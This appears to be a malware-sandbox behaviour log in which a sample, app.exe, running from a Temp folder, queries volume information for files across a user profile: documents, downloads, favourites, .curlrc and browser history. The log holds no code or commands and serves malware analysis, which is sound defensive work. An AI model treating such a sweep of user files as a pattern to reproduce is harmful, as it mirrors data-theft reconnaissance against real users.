Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\Word.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Desktop\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Music\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\PSAMNLJHZW VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Documents\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\IVHSHTCODI.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\UQMPCTZARJ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\XQACHMZIHU.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Downloads\YCGNAHEPCK.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Google.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\Favorites\Links VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Live.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Brighten Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\BRIGHT~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Darken Video.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\DARKEN~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\Enhance Video Colors.man.igpi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\IntelGraphicsProfiles\ENHANC~1.IGP VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links\Desktop.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Links\Downloads.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe\Acrobat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe\ARM VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe\Color VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
